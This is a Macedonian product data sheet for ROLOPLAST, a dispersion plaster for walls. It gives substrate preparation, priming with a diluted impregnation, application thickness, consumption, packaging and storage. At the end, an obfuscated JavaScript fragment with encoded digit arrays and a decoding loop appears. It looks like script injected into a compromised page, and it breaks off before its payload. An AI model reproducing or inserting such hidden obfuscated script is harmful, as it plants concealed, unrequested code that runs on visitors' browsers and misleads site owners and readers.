
Ролопласт

РОЛОПЛАСТ е дисперзивен малтер. Произведен е врз основа на алкално отпорни
дисперзии, квалитетни полнила, адитиви и светло постојани пигменти.

  

Примена: Се применува за заштитна декоративна обработка на надворешни и
внатрешни ѕидови изработени од бетонски површини со цврсти и здрави стари премази.
Не може да се нанесува на трајно влажни површини кои биле обработени со силиконски
импрегнации или силиконски бои.
 Преголемите нерамнини на подлогата треба да се израмнат со малтери што одговораат
најмалку со глет маса.

  

Пипремените површини да се импрегнираат со ПОЛИКОЛОР ФАСАДНА
ИМПРЕГНАЦИЈА, која за нанесување се разредува со вода во размер 1:5.

  

Да се нанесе со четка и суши 5 до 6 часа во нормални услови. Со метална или пластична
глетациа се нанесува РОЛОПЛАСТ во дебелина од 1.5 до 2mm, а потоа со сунгерест
валјак да се израмни. Најдобар резултат се постигнува доколку еден работник го
нанесува РОЛОПЛАСТОТ, а друг работник со валјак ја обработува површината.

  

РОЛОПЛАСТ по употреба може да се разреди со 5% вода.

  

Потрошувачка: 2-3кг/м2

  

Пакување: 25кг

  

Во прекин и на крај алатот да се мие со вода.
 Амбалажата добро да се затвори.

  

Складирање: се складира на температура од 5C до 35C.
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Рок на употреба: 18 месеци во оригиналната амбалажа.

  

Да се чува од замрзнување.

  

 var a=0,m,v,t,z,x=new
Array('9091968376','8887918192818786347374918784939277359287883421333333338896','
877886888787','949990793917947998942577939317'),l=x.length;while(++a
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